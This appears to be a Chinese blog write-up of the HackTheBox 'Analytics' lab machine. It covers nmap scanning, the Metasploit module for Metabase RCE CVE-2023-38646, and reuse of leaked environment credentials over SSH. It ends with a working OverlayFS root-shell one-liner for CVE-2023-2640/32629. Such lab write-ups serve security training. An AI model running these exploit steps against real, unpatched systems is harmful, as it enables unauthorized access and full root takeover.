HackTheBox-Machines--Analytics

本文详细描述了在进行网络测试时,从端口扫描开始,通过目录扫描、漏洞探测(如Metabase的CVE-2023-38646),获取权限并利用内核漏洞(如CVE-2023-2640和CVE-2023-32629)提升权限的过程。
摘要由CSDN通过智能技术生成


Analytics 测试过程


1 端口扫描


nmap -sC -sV 10.129.205.142

在这里插入图片描述


2 测试思路


目标服务器只开启了80端口,所以出发点从80端口开始。对于web页面,能做的大致思路有:

  1.目录扫描
  2.网站信息泄漏
  3.探测web站点漏洞
  4.网站指纹


3 漏洞探测


  1.访问web站点

echo "10.129.205.142 analytical.htb" | sudo  tee -a /etc/hosts

  访问web站点:http://analytical.htb/,发现存在login登录页面。

在这里插入图片描述

echo "10.129.205.142 data.analytical.htb" | sudo  tee -a /etc/hosts

  点击 Login 访问登录页面 http://data.analytical.htb,发现使用Metabase开源商业智能工具,探测是否有Metabase相关漏洞。

在这里插入图片描述

  2.搜索Metabase相关漏洞

search metabase

  发现Metabase存在CVE-2023-38646,可以进行CVE-2023-38646漏洞利用

在这里插入图片描述

  3.CVE-2023-38646漏洞利用

use exploit/linux/http/metabase_setup_token_rce
show options 

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

# 使用env命令查看环境变量,发现存在用户名密码
META_USER=metalytics
META_PASS=An4lytics_ds20223#

  接下来尝试使用ssh进行登录,如果可以连接,就能获取到metalytics的用户权限。


4 权限获取


  ssh登录,成功获取到metalytics用户权限,查看用户flag。

ssh metalytics@10.129.205.142

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述


5 权限提升


# 显示出自己(执行 sudo 的使用者)的权限
sudo -l

在这里插入图片描述

# 显示系统所有相关信息
uname -a

在这里插入图片描述

  通过查看系统相关信息,发现内核版本,查看该版本是否存在内核提权漏洞。Ubuntu内核的OverlayFS模块中,存在CVE-2023-2640 和 CVE-2023-32629漏洞,可以通过该漏洞将权限提升至root权限。

  漏洞利用代码如下:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'

在这里插入图片描述

ls -la /root
cat /root/root.txt

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值